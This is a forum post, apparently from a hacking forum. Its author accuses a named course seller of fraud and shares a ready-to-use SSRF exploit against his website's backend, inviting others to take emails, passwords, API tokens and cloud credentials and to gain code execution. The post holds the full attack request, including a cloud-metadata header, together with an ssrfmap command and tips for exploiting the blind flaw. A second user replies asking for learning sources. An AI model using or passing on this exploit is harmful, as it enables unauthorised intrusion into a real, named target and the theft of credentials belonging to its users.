[al133n]

There's a guy named Abdo Boutaleb selling success and e-commerce courses (a scam). I checked his website and found an SSRF vulnerability that you can exploit to extract all emails, passwords, APIs, tokens, AWS, and JWTt. You can also perform RCE on the server.

this is just a lesson for this MF scammer , the only able to exploit this vuln only the real breachers

u can use the below request , add a webhook to read the response or just use SSRFmap tool and save the request to a text file

• python3 ssrfmap.py -r request.txt -p locationId --level 5
  

NOTE : add your webhook in locatioID

Code:

POST /stats/event HTTP/2
Host: backend.leadconnectorhq.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://abdouboutaleb.com/
Channel: APP
Source: WEB_USER
Timezone: America/New_York
Version: 2021-04-15
Content-Length: 488
Origin: https://abdouboutaleb.com
Dnt: 1
Sec-Gpc: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Priority: u=4
Te: trailers
Metadata-Flavor: Google
Content-Type: application/json;charset=UTF-8

{"domainName":"abdouboutaleb.com","pageUrl":"/top-secret-o1","eventType":"page_view","fullUrl":"https://abdouboutaleb.com/top-secret-o1","fingerprint":"cfcbc88d-efb2-4910-aa1b-c621c24839f7","funnelId":"Byxbmj4dpADc6u3JwmAk","stepId":"56b33904-49ac-41ca-89f3-aab6e483548b","pageId":"X4do9C5OQOWouUbwLMTo","locationId":"WebHOOK","pageType":"funnel","pageName":"LP TOP DZ","haveBlogWidget":false}

Another NOTE : if it showes 400 BAD REQUEST , dont worry , this is a blind ssrf and needs a webhook with url redirect

[Covid19pandemic]

Woah this is golden mythology friend!...if you don't mind providing a source where I can learn such